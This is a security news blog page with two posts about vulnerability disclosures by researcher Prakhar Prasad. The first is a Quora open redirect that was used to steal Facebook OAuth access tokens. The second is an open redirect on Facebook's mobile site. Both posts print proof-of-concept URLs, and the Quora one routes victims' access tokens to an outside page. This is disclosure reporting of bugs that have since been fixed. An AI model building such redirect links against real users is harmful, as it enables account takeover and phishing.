Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Prakhar Prasad. Show all posts

Researcher found a way to Hack Facebook accounts with the help of Quora


An Indian Security researcher Prakhar Prasad has found a way to hack the facebook accounts by exploiting an open redirection flaw in Quora - one of the famous Question&Answer website.

Quora allows users to be signed up through facebook account.  While signing up for the quora, researcher noticed quora.com was permitted to receive access token from facebook oAuth.

Prasad has managed to steal the access token from the quora website by exploiting an open-redirect security flaw in the quora.com

POC provided by the researcher:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

"Facebook OAuth authorization URL requests token permission from the user, but as user will have Quora App installed, it will redirect to value specified in next parameter of OAuth authorization URL with a valid access_token" researcher said in his blog.

In this case , the next parameter's value is "https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora".  So the request will redirect user to the above URL with access token which further redirects to the prasad's page(exploiting open-redirect flaw).  The page created by prasad successfully captures the access token and direct users to the facebook.com

Unwitting users who follow the POC link soon find themself victim to the facebook account hack.

Complete technical details can be found in his personal blog.

You can also check out the video demo here:


Quora patched the security flaw few days after the Prasad reported the bug.

Open Redirection Vulnerability in Facebook Mobile website

Prakhar Prasad, a Web application security Researcher, has discovered Open Redirection vulnerability in the Facebook mobile website(m.facebook.com).

An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it

Usually, when you try to visit external links in facebook, the url will be passed to "l.php" page that will displays "Leaving Facebook" message before redirecting. So if it is malicious link, the page will show warning message.

But Prasad discovered one of the page in Facebook mobile redirects user directly to the external link.

POC:
http://m.facebook.com/video_redirect/?src=http://www.google.com
He found this vulnerability when he tried to view the uploaded video on Facebook mobile website.

Researcher immediately sent notification to Facebook about the vulnerability .  Facebook fixed the vulnerability and rewarded researcher with $500.